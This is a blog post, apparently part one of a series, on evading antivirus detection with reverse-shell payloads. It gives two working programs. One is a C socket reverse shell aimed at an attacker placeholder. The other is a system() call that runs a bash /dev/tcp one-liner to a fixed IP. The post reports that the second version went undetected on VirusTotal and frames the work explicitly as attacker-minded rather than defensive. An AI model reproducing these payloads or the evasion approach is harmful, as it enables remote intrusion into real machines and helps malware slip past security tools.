What if antivirus detection isn’t about what you write… but how you hide it?

In this blog series , we will walk through process of developing a simple reverse shell payload, mutating its binary, and watching detection drop to single digit.

This is not a defense blog.This is about thinking like an attacker — learning how AV engines detect malware, and how far you can go to fool them.

Let’s Begin :

I have written a small code which is pretty straight forwad no tricks.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main() {
    int sockfd;
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_port = htons(4444);
    sa.sin_addr.s_addr = inet_addr("ATTACKER_IP/HOST_IP");  
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);
    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    return 0;
}

after we compile it and generate the binary using

gcc binary.c -o BIN

Now when we upload BIN file to VirusTotal it was easily flagged by 8 vendors as malicious.

Now let’s make a small twist we will change the code and trust me you will be shocked by the results.

#include <stdlib.h>
int main() {
  system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.200/4444 0>&1'");
  return 0;
}

This performs the same purpose as above code i.e. spawn a reverse shell but when generate the binary and upload it to VirusTotal
It will not be flagged as malicious/suspicious by any vendor infact some are unable to process the file.

It is weird,isn’t it ?Well let’s know what is the reason for this different behaviour towards two codes which have same malicious purpose.

The first version of code (havin connect,socket,dup2,execve …) is a well-known reverse shell pattern.It is static,reliable and has been actually used in malware.Secondly VirusTotal mostly uses Static Analysis (Signature and Huesritics based detection).
1st version :- raw socket syscalls + execve => It is “binary native”
2nd version :- calls /bin/bash via system()

So we can say that first version of code is quite common while in second version of code we used system() which is not uncommon in legitimate programs and /dev/tcp is a bash feature which is often seen inlegitimate scripts and tools.

Since we have somewhat successfully evaded static analysis lets see if it could evade on sandbox detection.

I uploaded my Bin file without any mutations to hybrid analysis and well it was flagged malcious .

🚀 In the next part of this series, I’ll take this exact reverse shell and begin mutating it — no crypters, no encoders — just binary-level changes. The goal? Drop detection rates without altering functionality.

Can simple mutations really fool antivirus?

Stay tuned :).